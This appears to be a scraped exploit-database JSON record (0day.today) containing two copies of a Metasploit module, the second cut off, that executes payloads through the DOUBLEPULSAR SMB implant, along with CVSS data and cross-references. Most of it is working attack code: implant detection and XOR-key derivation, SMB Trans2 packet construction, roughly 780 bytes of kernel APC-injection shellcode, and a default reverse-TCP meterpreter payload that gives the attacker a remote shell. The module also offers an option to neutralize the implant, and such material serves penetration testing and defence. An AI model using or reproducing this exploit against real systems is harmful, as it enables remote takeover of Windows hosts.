ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-02] #"}, "lastseen": "2021-10-01T22:16:45", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "28ecf00b74016bd4aaac4123a39feb9e", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-02T22:16:00", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786", 
"1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:24:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-29T22:24:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
